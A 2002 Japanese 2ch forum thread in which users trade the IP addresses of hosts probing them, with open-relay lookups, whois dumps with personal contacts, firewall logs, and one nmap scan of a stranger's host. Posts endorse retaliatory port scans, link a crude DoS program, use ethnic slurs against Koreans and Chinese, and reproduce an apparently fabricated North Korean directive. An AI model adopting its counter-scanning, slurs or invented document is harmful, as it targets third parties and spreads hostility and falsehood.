ホスティングサービスなどがあるが大丈夫か??????

http://www.ordb.org/lookup/?host=www.canonet.ne.jp
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: www.canonet.ne.jp (202.228.190.225)
ORDB.org への初回登録日時: 2002-08-19 00:44 GMT
初回送信ホスト: 195.82.124.110
最終検査日時: 2002-08-19 00:44 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@bockscar.ordb.org
Received: from www.canonet.ne.jp (www.canonet.ne.jp [202.228.190.225])
by BocksCar.ORDB.org (Postfix) with ESMTP id 6E3435C47
for ; Mon, 19 Aug 2002 00:44:30 +0000 (GMT)
Received: from localhost.localdomain (ns.fgnet.dk [212.242.88.2])
by www.canonet.ne.jp (8.11.1/3.7W-01032503) with ESMTP id g7IMiQQ30724
for ; Mon, 19 Aug 2002 07:44:26 +0900 (JST)
Date: Mon, 19 Aug 2002 07:44:26 +0900 (JST)
Message-Id: < 200208182244.g7IMiQQ30724@www.canonet.ne.jp >
From: spamtest@canonet.ne.jp
To: marvin%marvin.ordb.org@canonet.ne.jp
X-ORDB-Envelope-From: spamtest@canonet.ne.jp
X-ORDB-Envelope-To: marvin%marvin.ordb.org@canonet.ne.jp
Subject: ORDB.org check (0.2807038021476490.2895395453) ip=202.228.190.225

402 :名無しさん@お腹いっぱい。:02/09/05 16:46
Nimda送るな糞チョン野郎!!
61.183.76.79

403 :名無しさん@お腹いっぱい。:02/09/05 23:03
毎日と接続するたびにアタックしてくる
この会社かなり怪しいのじゃないかな??
role: Japan Network Information Center
address: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
address: Chiyoda-ku, Tokyo 101-0047, Japan
country: JP
phone: +81-3-5297-2311
fax-no: +81-3-5297-2312
e-mail: hostmaster@nic.ad.jp
admin-c: SN108-AP
tech-c: KS218-AP
tech-c: TS153-AP
nic-hdl: JNIC1-AP
mnt-by: MAINT-JPNIC
changed: apnic-ftp@nic.ad.jp 19990629
changed: hostmaster@apnic.net 20011011
source: APNIC

inetnum: 211.13.128.0 - 211.13.159.255
netname: ASAHI-NET
descr: Asahi Net
country: JP
... 0047 東京都千代田区内神田 国際興業ビル 6F 社団法人日本ネ
ットワークインフォメーションセンター電話:+81/3/5297-2311 ...


404 :名無しさん@お腹いっぱい。:02/09/05 23:30
今日はじめてノートンセンセに!マークがつきました。
211.213.229.75
ノートン先生が動いてくれているってわかったのがうれしかったのですが、
相手が南朝鮮かと思うとなんかへこみます。

405 :名無しさん@お腹いっぱい。:02/09/06 00:22
>>401
いいから氏ね。

>>402
鯖立ててなければ問題ねえよ。

>>403
ASAHI-NETだボケ。

>>404
あっそ。


406 : :02/09/06 05:06
61.153.34.21 ←中国の大学から来来
ttp://www.zjnu.edu.cn/index3.htm



407 :名無しさん@お腹いっぱい。:02/09/06 06:37
おい!おまえら!
ポートスキャンやら、特定ポートにノックしてきたヤシを、どうしてますか?
まい対処法おしえてクソ。

ちなみに、小市民な漏れはnslookup、Trace Routeして、ついでにお礼にポートスキャンして差し上げてますが。


408 :名無しさん@お腹いっぱい。:02/09/06 11:52
80%は踏み台からなので無視してます

409 :(-_-メ):02/09/07 00:14
超賤人の攻撃ですぅ〜
2ch attack program
作成時刻 : 2002.09.06 15:17:12
web 30個を同時に浮かべて webサーバーをダウンさせる. ^-^
http://bbs.enjoyjapan.naver.com/jaction/read.php?id=enjoyjapan_8&nid=50614&work=list&st=&sw=&cp=1

410 :名無しさん@お腹いっぱい。:02/09/07 00:24
>>web30個を同時に浮かべて

web??(゚Д゚)ハァ??

411 :名無しさん@お腹いっぱい。:02/09/07 09:50
192,168,1,254
から今攻撃されています。



412 :名無しさん@お腹いっぱい。:02/09/07 11:44
>>411
ローカルアドレスを曝して楽しいか?

413 :名無しさん@お腹いっぱい。:02/09/07 11:48
>>412
朝からずっと攻撃して来てます。もう2時間ぐらい。

プロトコル:UDP(インバウンド)
リモートアドレス 192,168,1,254:5900
ローカルアドレス 239,255,255,250:ssdp(1900)

こいつです。何とかならないんでしょうか。
ローカルって何なんですか?



414 :名無しさん@お腹いっぱい。:02/09/07 11:55
http://pc.2ch.net/test/read.cgi/sec/1029845125/553-555 マルチ

415 :名無しさん@お腹いっぱい。:02/09/07 13:02
NetBus攻撃が毎日来る。
IPアドレスを偽造してのアタック(?)もある模様。

416 ::02/09/07 14:32
>>122
俺は梅味のホール図が最高に嫌いなんだけど

417 :名無しさん@お腹いっぱい。:02/09/07 14:45
>>413
ローカル=自分のパソコン側

418 :名無しさん@お腹いっぱい。:02/09/07 15:16
>>417
俺のパソコンのIPアドレスとぜんぜん違うのはなぜ?

419 :名無しさん@お腹いっぱい。:02/09/07 17:39
>>418
クラスD、IPアドレスの先頭4ビットが1110のもの、
つまり、224.0.0.0〜239.255.255.255のIPアドレスはマルチキャストに使われます。
調べればわかると思いますが、
あなたのパソコンだけを宛先とした通信ではないと思われます。

ついでに言うなら、リモートアドレスが192.168.1.254になってますよね。
192.168.0.0〜192.168.255.255のIPアドレスはプライベートIPアドレスといって
LAN内部等のパソコンに割り振るためのものです。

SSDP Discovery Serviceが有効になっているPCがLAN内部にありませんか?

420 :419:02/09/07 18:07
>>418
とりあえずここを読んでください。
http://homepage2.nifty.com/winfaq/wxp/network.html#754
宛先IPがそのまんまでしょ。
LANなんて組んでない、というなら
http://yougo.ascii24.com/gh/77/007780.html
CATVでインターネットに接続してないですか?

421 :名無しさん@お腹いっぱい。:02/09/08 00:14
>407
trcart かけてる間に逃げられた(相手が回線切断)ヨ。キータッチ遅いから
なあ(泣

422 :名無しさん@お腹いっぱい。:02/09/08 00:30
>>421
バッチファイルつくっとけ(藁

423 :韓国からの攻撃:02/09/08 12:32
なるふぉどー。


424 :ORDB.org に不正中継ホストとして登録されています:02/09/08 23:38
スパムメールより
http://tmp.2ch.net/test/read.cgi/tubo/1026829452/362

http://www.ordb.org/lookup/?host=mx2.alles.or.jp
このホストは ORDB.org に不正中継ホストとして登録されています。
データベースの検索結果: mx2.alles.or.jp (210.231.151.88)
ORDB.org への初回登録日時: 2002-09-07 20:53 GMT
初回送信ホスト: 193.162.159.97
最終検査日時: 2002-09-07 20:53 GMT
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@bockscar.ordb.org
Received: from mx.alles.or.jp (mx.alles.or.jp [210.231.151.65])
by BocksCar.ORDB.org (Postfix) with ESMTP id 293425865
for ; Sat, 7 Sep 2002 20:53:46 +0000 (GMT)
Received: from mx2.alles.or.jp (mx2.alles.or.jp [210.231.151.88])
by mx.alles.or.jp (8.9.3/3.7W-ALLESNET) with ESMTP id FAA10218
for <" marvin@marvin.ordb.org"@alles.or.jp >; Sun, 8 Sep 2002 05:53:44 +0900 (JST)
From: bitbucket@ordb.org
Received: from orthanc.spoon.adsl.dk (port262.ds1-arc.adsl.cybercity.dk [217.157.163.205])
by mx2.alles.or.jp (8.9.3/3.7W/allesnet) with ESMTP id FAA15500
for <" marvin@marvin.ordb.org"@alles.or.jp >; Sun, 8 Sep 2002 05:53:41 +0900 (JST)
Date: Sun, 8 Sep 2002 05:53:41 +0900 (JST)
Message-Id:< 200209072053.FAA15500@mx2.alles.or.jp >
To: " marvin@marvin.ordb.org"@alles.or.jp
X-ORDB-Envelope-From: bitbucket@ordb.org
X-ORDB-Envelope-To: " marvin@marvin.ordb.org"@alles.or.jp
Subject: ORDB.org check (0.02589071745740060.030549898) ip=210.231.151.88

425 :名無しさん@お腹いっぱい。:02/09/08 23:56
>>424
だからどこがクラックなんだよ。

426 :mx2.alles.or.jpは対応しました:02/09/09 15:04
アレスネット (株式会社ビーイング)サポトーセンター(アフォ)が2chを監視しています。

http://www.ordb.org/lookup/?host=mx2.alles.or.jp
このホストは ORDB.org に不正中継ホストとして登録されていません。
データベースの検索結果: mx2.alles.or.jp (210.231.151.88)
Look up this host in non-ORDB RBL's (May take a while to load)
ホスト mx2.alles.or.jp は ORDB.org のデータベースに登録されていません。
右記ホストの登録状態: mx2.alles.or.jp (210.231.151.88)
最終の検査依頼ホスト: 210.231.143.252
検査待ちリストへの最終登録日時: 2002-09-09 02:55 GMT
The server explicitly rejected all probes, and has been deemed secure by the ORDB testing engine.

210.231.143.252
http://whois.nic.ad.jp/cgi-bin/whois_gw?key=210.231.139.0-210.231.146.0

427 :名無しさん@お腹いっぱい。:02/09/09 16:04
とある大きい掲示板群のとある板でそこはIPが表示されるのですが
そこでネカマをやってるアホがいまして
IPが同じなのに別人だと言い張ってるのですが
同じ日に別人が同じIPになる確率は相当低いですよね?
そいつのIPは固定IPのようで知る限り半年くらい同じIPです。
ホストだと地域IPはPC事の判別できると聞いたんですけど
同じIPで別人というのはありえるんでしょうか?
もしかしたら別人なのか?と思うとあまり強い事もいえないのです。
板の平和のため詳しい方ぜひ教えてください。

428 :名無しさん@お腹いっぱい。:02/09/09 16:27
>>427
マルチ

429 :_:02/09/09 16:36
>>427
そりゃお前みたいなネチケットも知らんようなやつがいれば荒れて当たり前

430 :名無しさん@お腹いっぱい。:02/09/09 16:47
>>427
お前が荒らしだヴォケ
以後放置でお願いします

431 :うふーん。:02/09/10 17:37
なんか、ちょっと前からポートスキャンかけて来るやつがいるんだが、トレースしたらプライベートアドレスがネットに流れてるんだよ。
どういうこっちゃ?多分中国かそこら辺りだと思うんだが。よう。わからん
7  mae-west.cais.com (198.32.200.99) 188.960 ms 186.811 ms 187.712 ms
8 hgc.pos2-3.core1.la.cais.net (63.216.18.161) 238.491 ms 240.461 ms 237.730 ms
9 210.0.252.37 (210.0.252.37) 239.467 ms 239.859 ms 239.954 ms
10 210.0.255.4 (210.0.255.4) 239.956 ms 239.359 ms 239.201 ms
11 210.0.252.38 (210.0.252.38) 239.945 ms 239.105 ms 239.935 ms
12 172.20.0.5 (172.20.0.5) 240.701 ms 240.314 ms 241.196 ms
13 192.168.1.86 (192.168.1.86) 242.642 ms 243.522 ms 241.415 ms
14 10.12.0.34 (10.12.0.34) 240.202 ms * 333.024 ms
15 210.3.205.65 (210.3.205.65) 245.098 ms 242.075 ms 245.121 ms
21/tcp open ftp
22/tcp open ssh
23/tcp filtered telnet
80/tcp open http
111/tcp open sunrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
443/tcp open https
745/tcp open unknown
3306/tcp open mysql
5680/tcp open canna
22273/tcp open wnn6
22289/tcp open wnn6_Cn
22305/tcp open wnn6_Kr
22321/tcp open wnn6_Tw
32770/tcp open sometimes-rpc3
Remote operating system guess: Linux Kernel 2.4.0 - 2.4.17 (X86)
Uptime 10.777 days (since Fri Aug 30 22:44:38 2002)


432 :アレスネット、第三者中継:02/09/10 18:22
http://www.ordb.org/lookup/?host=210.231.131.65
データベースの検索結果: 210.231.131.65 (210.231.131.65)
不正中継が確認されたメールのヘッダ情報:
Return-Path:
Delivered-To: marvin@groundzero.ordb.org
Received: from mx.alles.or.jp (mx.alles.or.jp [210.231.151.65])
by groundzero.ordb.org (Postfix) with ESMTP id 248BF5B12D
for ; Tue, 10 Sep 2002 07:58:45 +0000 (GMT)
Received: from mx1.alles.or.jp (mx1.alles.or.jp [210.231.131.65])
by mx.alles.or.jp (8.9.3/3.7W-ALLESNET) with ESMTP id QAA17728
for < marvin@marvin.ordb.org@alles.or.jp >; Tue, 10 Sep 2002 16:58:42 +0900 (JST)
From: bitbucket@ordb.org
Received: from groundzero.ordb.org (groundzero.ordb.org [62.242.0.190])
by mx1.alles.or.jp (8.12.5/3.7W/MX1) with ESMTP id g8A7wUqL000052
for < marvin@marvin.ordb.org@alles.or.jp >; Tue, 10 Sep 2002 16:58:31 +0900 (JST)
Date: Tue, 10 Sep 2002 16:58:30 +0900 (JST)
Message-Id:< 200209100758_g8A7wUqL000052@mx1.alles.or.jp >
To: marvin@marvin.ordb.org@alles.or.jp
X-ORDB-Envelope-From: bitbucket@ordb.org
X-ORDB-Envelope-To: marvin@marvin.ordb.org@alles.or.jp
Subject: ORDB.org check (0.376848151948330.67616265010) ip=210.231.131.65

433 :名無しさん@お腹いっぱい。:02/09/11 00:35
第三者中継データベース野郎の公開オナニーはこちらで行っております。

434 :名無しさん@お腹いっぱい。:02/09/11 01:11
うちは韓国がダントツですね〜 Nimdaによるものも多いけど。
今日なんか、香港のIPから匿名でFTPにアクセスがあった。

気持ちわるいので、IISのコンソール見たら、勝手にWWWサイトが作られてて
何故かポートが21になってた。匿名アクセス付き。

謎…


435 :名無しさん@お腹いっぱい。:02/09/11 02:40
>>390
同じところから毎日ping attackがある。
>>419によればいろんなところにやってるってことですよね。
会社みたいだけど、どうしてそういうことするんですか?
何か徳するんですか?


436 :名無しさん@お腹いっぱい。:02/09/11 03:14
危険SPAMメールサーバーのリスト
http://pc.2ch.net/test/read.cgi/sec/1020932589/l50

437 :名無しさん@お腹いっぱい。:02/09/11 04:34
スペインから来ますた
212.170.206.58

438 :名無しさん@お腹いっぱい。:02/09/11 14:04
biwa39.he.net
これって何?

439 :名無しさん@お腹いっぱい。:02/09/11 14:05
びわ39個食ったら屁がネットリ

440 :名無しさん@お腹いっぱい。:02/09/11 14:07
>>438 ここ見りゃわかる。http://users72.psychedance.com/
つーか2chのサーバだよ。

441 :名無しさん@お腹いっぱい。:02/09/11 14:09
>>440
そーなんだ
あんがと

442 :   :02/09/11 18:37
IP:61.210.112.21
プロトコル:TCP
毎日5時間くらい夕方から攻撃してきます・・・・・
全然素人なのでどうしていいものかわからないで・・・・
なんとかならいでしょうか?おねがいします

443 :名無しさん@お腹いっぱい。:02/09/11 22:31
ラトビアからスキャン♪
62.85.48.120

(;´Д`)エライ遠いな・・・

444 :名無しさん@お腹いっぱい。:02/09/11 23:33
>>435
ttp://www.iprevolution.ne.jp/html/indexf.html

株式会社アイ・ピー・レボルーション
ここかなあ・・・

445 :名無しさん@お腹いっぱい。:02/09/12 00:17
やっとオーストラリアからのコアラ攻撃こなくなった

apnicは相変わらずニダ

446 :hage:02/09/12 00:23
このレスおもしろくて(・∀・)イイ!!

447 :446:02/09/12 00:24
スレの間違いです
逝ってきます・・

448 :名無しさん@お腹いっぱい。:02/09/12 00:27
>>445
>コアラ攻撃
どんな攻撃!?

よかたらパケットダンプ貼ってくれ!!
WHOISのコピペは要らないから。。。。

449 : :02/09/12 01:30
ユーカリの葉を耳元でサクサクサクってかじってくれる攻撃のことさ

450 :初心者:02/09/12 13:22
これは何処からですかね。211.203.38.35 何方か解る方おながいすます。

451 : ◆TLe2H2No :02/09/12 20:52
俺も218.031.89からポトスキャ&アタックがきてる

452 :名無しさん@お腹いっぱい。:02/09/12 21:39
217.197.166.142
こいつスゲェ〜しつこい

453 :名無しさん@お腹いっぱい。:02/09/12 22:46
>>450
ttp://www.mse.co.jp/ip_domain/lookup.shtml
ここで調べられるかもよ。

454 :453:02/09/12 22:53
>>452
ワルシャワからですね。

455 :名無しさん@お腹いっぱい。:02/09/12 23:53
>>453
これ便利だね

456 :初心者:02/09/13 00:25
>453 ありがとう。

457 :_:02/09/13 09:48
俺なんてアタックされまくりだよ
1日に4,5回マシン落ちてるからね

458 :453:02/09/13 16:32
>>455-456
どういたしまして、です。役に立てて嬉しいよ。
ttp://www.arearesearch.co.jp/ip-kensaku.html
453で紹介したとこは検索の回数制限があるみたい。
新しく見つけたとこは、回数制限はなさそうです。
よかったら参考にしてください。

459 :名無しさん@お腹いっぱい。:02/09/14 00:23
80.13.232.86:1210
AMontpellier-102-1-2-86.abo.wanadoo.fr

OrgName: RIPE Network Coordination Centre
OrgID: RIPE

NetRange: 80.0.0.0 - 80.255.255.255
CIDR: 80.0.0.0/8
NetName: 80-RIPE
NetHandle: NET-80-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS.RIPE.NET
NameServer: AUTH62.NS.UU.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: MUNNARI.OZ.AU
NameServer: NS.APNIC.NET
NameServer: SVC00.APNIC.NET
Comment: These addresses have been further assigned to users in
the RIPE NCC region. Contact information can be found in
the RIPE database at whois.ripe.net

RegDate:
Updated: 2002-09-11

460 :名無しさん@お腹いっぱい。:02/09/14 00:26
Technical Contact:
Contacts of FTI (abuse@wanadoo.fr)
France Telecom Interactive
41, rue Camille Desmoulins
92442 Issy Les Moulineaux cedex
Phone: +33 1 41 33 39 00
Fax: +33 1 41 33 39 01

Zone Contact:
NIC France Contact (tech@nic.fr)
AFNIC
immeuble international
2, rue Stephenson
Montigny-Le-Bretonneux
78181 Saint Quentin en Yvelines Cedex
France
Phone: +33 1 39 30 83 00
Fax: +33 1 39 30 83 01

Administrative Contact:
Bruno Drouet
WIN
48, rue Camille Desmoulins
92791 Issy-les-Moulineaux Cedex
France
Phone: +33 1 58 88 50 00

Name Servers:
ns.wanadoo.fr 193.252.19.10
ns.wanadoo.com
ns2.wanadoo.fr 193.252.19.11
ns2.wanadoo.com

461 :名無しさん@お腹いっぱい。:02/09/17 00:00
150.55.115.100

462 :hackman ◆TLe2H2No :02/09/17 18:12
>>461
eq.pisco.ous.ac.jpだね

463 :名無しさん@お腹いっぱい。:02/09/17 22:30
64.71.137.42
Hurricane Electric HURRICANE-2 (NET-64-71-128-0-1)
64.71.128.0 - 64.71.191.255
NT Technology HURRICANE-CE0023-0B3 (NET-64-71-137-40-1)
64.71.137.40 - 64.71.137.47

# ARIN Whois database, last updated 2002-09-16 19:05
# Enter ? for additional hints on searching ARIN's Whois database.



464 :名無しさん@お腹いっぱい。:02/09/18 06:48
馬鹿



465 :_↑:02/09/18 13:24
 

466 :名無しさん@お腹いっぱい。:02/09/18 13:44
http://www.google.co.jp/search?q=211.104.16.9%E3%80%80&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

これがZONEに反応してうざいですう。
どこの国ですかぁ?何か仕込まれたんですかぁ?

467 :名無しさん@お腹いっぱい。:02/09/18 14:15
>>466
ZoneAlarmがうるさいなら、警告メッセージを表示しないようにしとけ
マルチポストするな

468 :名無しさん@お腹いっぱい。:02/09/18 21:42

バカ

469 :名無しさん@お腹いっぱい。:02/09/18 22:10
.it(イタリア)
.fr(フランス)
の2国からやたらくるんだけど。
.kr(韓国)
.cn(中国)はまったくなし。
ちなみにMac OSX。

470 :467:02/09/18 22:29
>>468
何か見当違いな事でも言ったか?

471 :名無しさん@お腹いっぱい。:02/09/18 23:36
http://8425.teacup.com/loose178/bbs?m=iこの板クラックされたらしいです 助ける方法ないですか?誰かなんとかしたげて

472 :名無しさん@お腹いっぱい。:02/09/18 23:42
>>471
俺にはアクセスする権限がないので無理

473 :名無しさん@お腹いっぱい。:02/09/18 23:47
あれ入れなくなった

474 :名無しさん@お腹いっぱい。:02/09/19 06:36
バカ

475 :名無しさん@お腹いっぱい。:02/09/19 13:26
193.108.154.50

476 :名無しさん@お腹いっぱい。:02/09/19 13:27
↑fbi.gov

477 :名無しさん@お腹いっぱい。:02/09/19 18:58
北朝鮮朝鮮民主主義人民共和国

478 :名無しさん@お腹いっぱい。:02/09/19 19:31
朝鮮総連青年部情報委員会通達 第98-09-02号
インターネットでの協力者育成ならびに、反動的人物・団体の調査について。


1.指示者 在中2等書記官 李 明善
2.概要
先の通達(第98-08-13号)のとおり、インターネットにおいて祖国に対する
卑劣な誹謗・中傷がおこなわれている。特に先月実施された祖国による通常
の軍事演習に対し、米帝国主義者および南朝鮮反動分子による祖国への敵視
政策の強化を目的とした宣伝活動が活発化しており、日本における思想戦に
勝利するため、青年部有志による祖国への貢献を以下のとおり要請する。
3.行動内容
1) 日本語を常用語とするインターネット上コミュニティーにおいて、米帝
国主義者および南朝鮮反動分子らの活動から祖国を防衛し、金日成主席が
創始し、金正日将軍閣下が発展された主体思想を流布するため、協力者の
育成ならびに反動的人物・団体の調査をおこなう。
2) 政治的な色彩の濃い、あるいは高度な技術情報が流れる掲示板(BBS)、IRC
等を重点的に活動する。(「インターネット活動要項 (2)」を参考。)
3) 反動的人物・団体を発見した場合は、地区長へ通報の上、可能な限りの
情報を収集する。なお個人が特定できない場合、インターネット接続業者
を通じてアカウント名の割り出しをおこなう。
3) 政治的指導性もしくはインターネット上での行動力をもつものについ
ては、協力者としての育成をはかる。ただし協力者と地区長に認められる
まで、自らの立場を明らかにしてはならない。

その他 インターネットでの調査技術に関しては「インターネット活動要項 (A)」
を参考とする。詳細は各所轄地区長の指示を仰ぐこととする。
(以 上)
※ 本文書の取り扱いには特に注意すること。

479 :名無しさん@お腹いっぱい。:02/09/21 15:38
↑バカ


480 :名無しさん@お腹いっぱい:02/09/21 15:58
a193-1※8-154-50.de※oy.akamaitechnolog※※※.com

481 :名無しさん@お腹いっぱい。:02/09/23 02:49
205.171.1.17 はどこの国の何者ですか?(;´Д`)
アタックされますた

482 :名無しさん@お腹いっぱい。:02/09/23 03:14
>>480
アカマイテクノロジーの意味知ってんのか?

>481
OrgName: Colorado SuperNet, Inc.

483 :名無しさん@お腹いっぱい。:02/09/23 03:22
フィンランドから来た

484 :名無しさん@お腹いっぱい。:02/09/27 01:07
80.15.134.52
ここ↑はどこの国なんですか?


485 :名無しさん@お腹いっぱい。:02/09/27 02:53
>>484
フランスじゃねーの?

486 :あぼーん:あぼーん
あぼーん

487 :名無しさん@お腹いっぱい。:02/09/27 16:36
IANA-NETBLOCK
IANA→こいつがいつもアタックしてくる

国はオーストラリア
何者?

488 :名無しさん@お腹いっぱい。:02/09/28 23:19
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC

NetRange: 61.0.0.0 - 61.255.255.255
CIDR: 61.0.0.0/8
NetName: APNIC3
NetHandle: NET-61-0-0-0-1
Parent:
NetType: Allocated to APNIC
NameServer: NS1.APNIC.NET
NameServer: NS3.APNIC.NET
NameServer: NS.RIPE.NET
NameServer: RS2.ARIN.NET
Comment: This IP address range is not registered in the ARIN database.
For details, refer to the APNIC Whois Database via
WHOIS.APNIC.NET or http://www.apnic.net/apnic-bin/whois2.pl
** IMPORTANT NOTE: APNIC is the Regional Internet Registry
for the Asia Pacific region. APNIC does not operate networks
using this IP address range and is not able to investigate
spam or abuse reports relating to these addresses. For more
help, refer to http://www.apnic.net/info/faq/abuse

ここしつこい。今日だけで10回ぐらいアタックしてきたよ。

489 :名無しさん@お腹いっぱい。:02/09/29 09:15
IR
ITARY
など

490 :名無しさん@お腹いっぱい。:02/09/29 13:15
>>488
それの意味分かってるのか?

491 :名無しさん@お腹いっぱい。:02/09/29 15:28
>>488

わはは。 APNICから攻撃うけてるなんて言ってるヤシハッケーソ!


492 :執拗ですこの人たち:02/10/03 21:41
inetnum: 211.216.0.0 - 211.225.255.255
netname: KORNET
descr: KOREA TELECOM
descr: KOREA TELECOM Internet Operating Center
country: KR
person: Dongjoo Lee
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: ip@ns.kornet.net
nic-hdl: DL276-AP
mnt-by: MNT-KRNIC-AP
changed: hostmaster@nic.or.kr 20010523
source: APNIC



493 : :02/10/03 21:45
だんとつ韓国

494 :名無しさん@お腹いっぱい。:02/10/03 21:46
person: Won Kang address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR  phone: +82-2-747-9213fax-no: +82-2-766-5901
e-mail: ip@ns.kornet.net nic-hdl: WK81-AP
mnt-by: MNT-KRNIC-APchanged: hostmaster@nic.or.kr 20010523
source: APNIC
inetnum: 211.219.192.0 - 211.219.196.255
netname: KORNET-XDSL-SASANG-KR descr: SASANG NODE
descr: 281-9 HAKJANGDONG SASANGKU
descr: PUSAN
descr: 617-020
country: KRadmin-c: GP1289-KRtech-c: WK5358-KR
person: GilSoon Park
descr: KOREA TELECOM
descr: 128-9 Youngundong Chongroku
descr: SEOUL
descr: 110-460 country: KR
phone: +82-2-747-9213 fax-no: +82-2-766-5901
e-mail: gspark@kornet.net nic-hdl: GP1289-KR
mnt-by: MNT-KRNIC-AP 
person: Won Kang
descr: KOREA TELECOM
descr: 128-9 Youngundong Chongroku
descr: SEOUL
descr: 110-460
country: KR
phone: +82-2-747-9213 fax-no: +82-2-766-5901
e-mail: ip@ns.kornet.net nic-hdl: WK5358-KR
mnt-by: MNT-KRNIC-AP


495 :もうイヤヤわぁ〜:02/10/03 21:54
1位:韓国
2位:中国
3位:オ−ストラリア


496 :名無しさん@お腹いっぱい。:02/10/05 18:01
インドからきた
202.54.79.179

497 :名無しさん@お腹いっぱい。:02/10/05 23:14
208.206.212.72
IANA-NETBLOCK
オーストラリアからいつも
氏ね

498 : :02/10/05 23:17
韓国 中国 オーストラリア!!!
たまにインド



499 :名無しさん@お腹いっぱい。:02/10/06 00:29
日本ももっとブロードバンド化が進めば、韓国のようにワームを大量
生産するんだろうなぁとおもいました まる

500 :またカンコックから:02/10/06 00:50
211.186.170.183,ftp(21)
person: Myungsun Noh
descr: Thrunet Co.,Ltd
descr: 1338-5 SEOCHO-2DONG, SEOCHO-KU
descr: SEOUL
descr: 137-072
country: KR
phone: +82-2-3488-8452
fax-no: +82-2-3488-8777
e-mail: abuse@thrunet.com




501 :既出か?:02/10/06 02:06
このランキングって、もしかしてセキュリティソフト入れずに
パソコン使ってる人間の数に比例しているんじゃないのか。

502 :/:02/10/06 05:52
俺この一年で、2〜3回しかピングやポートスキャンされてないけど
何で皆そんなに多いんだ????

503 : :02/10/06 06:48
最近韓国が増えてきた

504 :名無しさん@お腹いっぱい。:02/10/06 18:49
日本から来た人いる?

505 : :02/10/06 20:18
80.71.67.7

506 :login:Penguin:02/10/06 20:52
俺のランキングでは

1. 韓国
2. 国内
3. 中国

ってな感じです。
韓国って・・ブロバン普及率世界一の代償に低レベルばかり?
とにかくIISからのワームによる攻撃多し。
近頃はあちこちからSlapperが増えてまふ。

507 :名無しさん@お腹いっぱい。:02/10/06 22:48
pc32209.stofanet.dkこれってデンマ-ク?

508 :今日4回:02/10/06 23:07
203.186.215.83
inetnum: 203.186.128.0 - 203.186.255.255
netname: CTIHK
descr: City Telecom (H.K.) Ltd.
descr: Internet Service Provider in Hong Kong
country: HK


509 :名無しさん@お腹いっぱい。:02/10/07 08:03
>>51
>ピンポン・ダッシュみたいなもんだから心配しなくていいよ。

ワラタ。本当に同感。はっくだのクラックだのってICMPパケット飛ばして
悦に入ってる厨房がたくさん。

510 : :02/10/07 15:01
Asia Pacific Network Information Centre って何なの?
攻撃じゃないのか、よかったけど・・

511 :名無しさん@お腹いっぱい。:02/10/07 15:13
http://www.apnic.net/

512 :名無しさん@お腹いっぱい。:02/10/07 16:21
第1位:中国、なんでこう毎日飽きずにアタックかけてくるんだか…
第2位:韓国、ワールドカップの興奮はもう冷めてますよ。
第3位:台湾、てゆうか、あんた中国の属国でしょ(暴言)

これだけ言いたい。
「手前ンとこのポート塞いでからにせえやボケ」
なんでスキャンしてくるヤツに限って自分の所はおざなりか。

513 :名無しさん@お腹いっぱい。:02/10/07 16:52
昨日アンチウィルス入れたんだけどアタックされまくり。
64.159.95.152
このIP調べても英語でしかでてこないから、調べられないっす。
誰か分かる人教えてください。・゚・(ノД`)・゚・。

514 :名無しさん:02/10/07 19:06
513が何を調べたいのか分らない

515 :名無しさん@お腹いっぱい。:02/10/07 20:31
さらに一行目のい身がわからん

516 :名無しさん@お腹いっぱい。:02/10/08 04:13
>>515
おそらく、「ウイルス対策ソフトを入れたらアタックされまくりであることが
表面化した」ってことだロ。それまで全然気がつかなかったという…

>>513
何を調べてどうしたいのかもっと明確に賭!ちなみに、このIPアドレスは
city-guide.comドメインの配下にあるっぽい。

517 :またチョソから:02/10/08 15:15
211.192.206.187,ms-sql-s(1433)
person: Sungwoo Lee
descr: DAEDONG
descr: 140-17 Samsung-dong Kangnam-gu
descr: SEOUL
descr: 135-090
country: KR
phone: +82-2-569-4811
fax-no: +82-2-569-4811
e-mail: sysop04@soback.kornet.net
nic-hdl: SL4227-KR
mnt-by: MNT-KRNIC-AP
remarks: This information has been partially mirrored by APNIC from
remarks: KRNIC. To obtain more specific information, please use the
remarks: KRNIC whois server at whois.krnic.net.
changed: hostmaster@nic.or.kr 20020923
source: KRNIC

518 :名無しさん@お腹いっぱい。:02/10/08 18:03
こんなとこから来た。てのはない?

今日はウクライナからお客が来ました

519 :名無しさん@お腹いっぱい。:02/10/08 23:13
Name: marutemp-e220.interq.or.jp
Address: 210.172.130.194

こいつウザイ

520 :名無しさん@お腹いっぱい。:02/10/09 02:26
>>518
Berkley.eduドメイン配下のマシンから来たYO!
例のNetBIOS Browsingだが

521 :名無しさん@お腹いっぱい。:02/10/09 15:46
みんないいなぁ
俺なんか2,3日に1回イタリアンがポートスキャンしてくるだけだよ
カンコックとか中国からは何も無し

せっかくsygateのproを入れてるのに・・・(´・ω・`)

522 :インバウンド IP 断片をブロックしました:02/10/11 02:00
インバウンド IP 断片をブロックしました。 詳細:
プロトコル UDP
リモートアドレス 210.181.1.238
ローカルアドレス 81.86.109.151

インバウンド IP 断片をブロックしました。 詳細:
プロトコル UDP
リモートアドレス 211.58.56.249
ローカルアドレス 169.254.6.16

インバウンド IP 断片をブロックしました。 詳細:
プロトコル UDP
リモートアドレス 210.181.1.238
ローカルアドレス 209.63.151.252



523 :名無しさん@お腹いっぱい。:02/10/11 02:06
さっき見たらポルトガルだと。
あそこってPCあるんだ...

524 : :02/10/11 02:15
チュニジアから来た

525 :鬼畜米英之レ皆氏スへシ:02/10/11 22:45
SmartWhois 146.245.2.221

146.245.0.0 - 146.245.255.255
Brooklyn College
2900 Bedford Avenue Brooklyn NY 11210
US

--------------------------------------------------------------------------------

Best, David
david@brooklyn.cuny.edu
+1-718-951-5861


TransScoutうざい

